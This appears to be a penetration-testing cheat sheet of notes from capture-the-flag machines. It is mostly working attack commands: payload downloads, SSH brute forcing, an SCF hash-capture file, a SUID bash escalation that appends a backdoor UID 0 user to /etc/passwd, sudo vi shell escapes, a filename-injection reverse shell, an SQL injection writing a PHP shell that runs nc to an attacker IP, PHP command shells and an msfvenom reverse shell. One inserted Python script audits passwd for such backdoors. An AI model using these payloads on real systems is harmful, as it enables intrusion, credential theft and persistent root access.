Download file from CLI
Linux:
wget http://<ip>/<file>
Windows:
certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe
SMB:
smbclient \\\\<ip>\\<sharename> -U <username>
Upgrade simple shell to interactive
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo;fg
export TERM=xterm-256color
(https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
Decode/Encode JWT Tokens
SMB Share SCF File Attack
share.scf
[Shell]
Command=2
IconFile=\\10.10.14.12\share\icon.ico
[Taskbar]
Command=ToggleDesktop
PowerShell Execution Policy
Get-ExecutionPolicy
Check Execution Policy
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
Set Execution Policy to Unrestricted so as to be able to Import Modules
LFI + PHP File Uploads
HTTP request header + body
POST /phpinfo.php HTTP/1.1
<TRUNCATED>
Content-Type: multipart/form-data; boundary=--Test
<TRUNCATED>
---Test
Content-Disposition: form-data; name="anything"; filename="file"
Content-Type: text/plain
Woohoooooooooooo
---Test
SSH Tunneling / Port Forwarding
ssh -D <port> <user>@<host>            (dynamic SOCKS proxy on local <port>)
ssh -L <lport>:<rhost>:<rport> <user>@<host>   (local <lport> forwarded to <rhost>:<rport>)
Can use chisel as well
SSH Login Brute Force (kinda broken tho)
when hydra doesn’t work
patator ssh_login host=10.10.10.76 port=22022 user=FILE0 0=/usr/share/seclists/Usernames/Names/names.txt password=FILE1 1=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0
ssb -p 22022 -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -v sunny@$IP
wget Quickies
wget -i <localfile>
wget http://yourip:port/file -O outputfile
Using bash binary to privesc via suid
onuma@TartarSauce:/var/tmp/check/var/www/html$ ./bash -p
bash-4.3# id
uid=1000(onuma) gid=1000(onuma) euid=0(root) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
But to get UID 0 and not just EUID 0, we can edit /etc/passwd to create a new root-equivalent user (UID 0) with a different name and password and switch to it.
bash-4.3# cp /etc/passwd /dev/shm
bash-4.3# openssl passwd -1 Password1
$1$TBJpMCue$Uzl02jOSnrQBz40ES6j611
bash-4.3# echo 'attacker:$1$TBJpMCue$Uzl02jOSnrQBz40ES6j611:0:0:attacker:/root:/bin/bash' >> /etc/passwd
bash-4.3# su attacker
Password:
root@TartarSauce:/var/tmp/check/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
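A defender-side check for the trick shown above (an added example, not part of the original notes): parse passwd lines and flag any account other than root that carries UID 0, plus any entry that stores a crypt hash inline instead of the usual 'x' placeholder pointing to /etc/shadow. The sample passwd content is constructed.

```python
#!/usr/bin/env python3
"""Audit /etc/passwd content for the backdoor pattern above: an extra
UID 0 account, and a password hash written straight into passwd."""
import sys

# Constructed sample; the 'attacker' line mirrors the one appended above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
onuma:x:1000:1000:onuma,,,:/home/onuma:/bin/bash
attacker:$1$TBJpMCue$Uzl02jOSnrQBz40ES6j611:0:0:attacker:/root:/bin/bash
"""

# Password-field values that mean "no hash stored in this file".
SHADOWED = {"x", "*", "!", "!!", ""}


def audit_passwd(text):
    """Return a list of (username, reason) findings for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, f"line {lineno}: malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        try:
            uid_n = int(uid)
        except ValueError:
            findings.append((name, f"line {lineno}: non-numeric UID"))
            continue
        # Any second UID 0 account is root-equivalent regardless of its name.
        if uid_n == 0 and name != "root":
            findings.append((name, "extra UID 0 account"))
        # A hash here bypasses /etc/shadow and is readable by everyone.
        if pw not in SHADOWED:
            findings.append((name, "password hash stored in passwd, not shadow"))
    return findings


def main(path):
    with open(path) as fh:
        for name, reason in audit_passwd(fh.read()):
            print(f"{name}: {reason}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd")
```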
PHP Wrapper
=php://filter/convert.base64-encode/resource=login
DNS Zone Transfer
dig axfr @$IP $domain >> zonetransfer
aquatone - enumerate several known pages
cat hosts | aquatone
Sudo -l example
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
sudo vi /var/www/html/something
ESC :!/bin/bash
OR
sudo vi /var/www/html/test -c ':!/bin/bash'
Reverse Shell via Filename “poisoning”
Only works with script running to trigger the command
touch ';nc -c bash 10.10.14.12 4444;.php'
PHP - SQL Injection - URL encoded
URL-encoded PHP code (php echo shell_exec) to get shell using nc & bash
GET /room.php?cod=9999+union+select+1,2,3,(select+%27%3C?php+echo+shell_exec(%22nc+-e+/bin/bash+10.10.14.17+4444%22);?%3E%27),5,6,7+INTO+OUTFILE+%27/var/www/html/shell.php%27 HTTP/1.1
Find SUID Binaries
find / -perm -4000 -ls 2>/dev/null
PHP Request code
filename.php?a=whoami
<?php echo system($_REQUEST['a']); ?>
msfvenom Reverse Shell
[stageless]
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.17 LPORT=4444 > msf.exe
[staged]
windows/shell/reverse_tcp
SMB Server
impacket-smbserver sharename .
Copy from local SMB Share
copy \\localhost\sharename\file
Custom Password list via web crawl (cewl)
cewl -d 7 -m 8 -w cewl.out --with-numbers http://fuse.fabricorp.local/papercut/logs/html/index.htm
Custom Password list (hashcat)
hashcat --force custom -r /usr/share/hashcat/rules/best64.rule --stdout > pass
RPC
null authentication
rpcclient -U "" -N $IP
SMB Change Password
smbpasswd -U user -r $IP
Kerberos Pre-Auth Bruteforcing
~/scripts/kerbrute userenum --dc $IP -d domain USERLIST
dnstool - to add DNS records to AD via LDAP (located in ~/opt)
python3 dnstool.py -u 'domain\user' -p pass -r newdomain.domain -a add -t A -d LHOST RHOST
Simple PHP Shell (cmd)
<?php system($_REQUEST['cmd']); ?>
RDP into windows
xfreerdp /u:$USERNAME /p:$PASSWORD /cert:ignore /workarea /smart-sizing:1280x720 /v:$IP
copy files from remote to local via SSH (use scp)
scp $USERNAME@$IP:$FULLPATH .
nbtscan - 137/tcp/udp , 138/udp , 139/tcp
NBTscan is a program for scanning IP networks for NetBIOS name information. It sends a NetBIOS status query to each address in the supplied range and lists the received information in human-readable form.
nbtscan xxx.xxx.xxx.0/24